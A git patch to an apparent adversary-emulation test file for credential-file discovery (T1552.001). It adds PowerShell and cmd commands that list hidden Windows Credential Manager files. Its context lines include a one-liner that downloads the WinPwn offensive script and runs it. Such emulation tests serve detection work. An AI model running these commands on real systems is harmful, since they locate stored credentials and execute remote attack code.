From 7c51b76bcde3c543a76dfb60ae1bd16c18dbc3a3 Mon Sep 17 00:00:00 2001
From: abhijose09 <bagchiabhijit09@gmail.com>
Date: Fri, 12 Jul 2024 20:28:48 +0530
Subject: [PATCH] Update T1552.001.yaml (#2842)

* Update T1552.001.yaml

New Test Added : List Credential Files via PowerShell

* Update T1552.001.yaml

Added Test List Credential Files via PowerShell , List Credential Files via Command Prompt

* Updated command lines

Updated command lines
---
 atomics/T1552.001/T1552.001.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index b8d3ebc8..1c93860d 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -162,3 +162,28 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       SharpCloud -consoleoutput -noninteractive  
     name: powershell
+- name: List Credential Files via PowerShell
+  description: |
+    Via PowerShell,list files where credentials are stored in Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $usernameinfo = (Get-ChildItem Env:USERNAME).Value
+      Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
+      Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
+      
+    name: powershell
+    elevation_required: true
+- name: List Credential Files via Command Prompt
+  description: |
+    Via Command Prompt,list files where credentials are stored in Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
+      dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
+      
+    name: command_prompt
+    elevation_required: true